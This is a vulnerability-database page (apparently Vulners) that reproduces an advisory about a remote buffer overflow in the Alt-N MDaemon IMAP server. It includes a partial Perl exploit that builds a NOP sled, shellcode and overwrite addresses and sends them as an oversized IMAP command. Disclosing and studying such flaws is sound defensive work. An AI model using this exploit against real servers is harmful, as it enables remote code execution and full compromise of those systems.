Alt-N MDaemon 2-8 - IMAP Remote Buffer Overflow
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| MDaemon < 8.1.4 Remote Overflow | 29 May 200600:00 | – | nessus | |
| CVE-2006-2646 | 30 May 200610:00 | – | cve | |
| CVE-2006-2646 | 30 May 200610:00 | – | cvelist | |
| EUVD-2006-2645 | 7 Oct 202500:30 | – | euvd | |
| CVE-2006-2646 | 30 May 200610:02 | – | nvd | |
| Buffer overflow | 30 May 200610:02 | – | prion | |
| IMAP Servers Overly Long Commands Buffer Overflow (CVE-2005-3155; CVE-2006-0853; CVE-2006-1255; CVE-2006-2502; CVE-2006-2646; CVE-2007-1579) | 14 Dec 200600:00 | – | checkpoint_advisories |
source: https://www.securityfocus.com/bid/18129/info
Alt-N MDaemon IMAP Server is susceptible to a remote buffer-overflow vulnerability. This issue is due to the application's failure to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
This issue allows remote, unauthenticated attackers to execute arbitrary machine code in the context of affected servers. This facilitates the complete compromise of affected computers.
Specific information regarding affected versions is not currently available. This BID will be updated as further information is disclosed.
UPDATE: The reporter of this issue states that this issue may not be exploitable. This BID may be retired in the future.
$where = "\x4c\x14\xed\x77"; # UnhandledExceptionFilter 77ED144C
#$where = "\x20\xf0\xfd\x7f"; # PEB Lock Pointer 7FFDF000
$what = "\x3d\xb9\x82\x02"; # JMP EDX 03bfcb9A
$nops = "A" x 100;
$a = $nops . $shellcode . ("Z" x (0x2006-length($shellcode)-length($nops))) . $what . $where . ("Z" x (0x184AC - 0x200A - 12));
print $sock "a001 \"$a\r\n";
close($sock);Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Aug 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.0455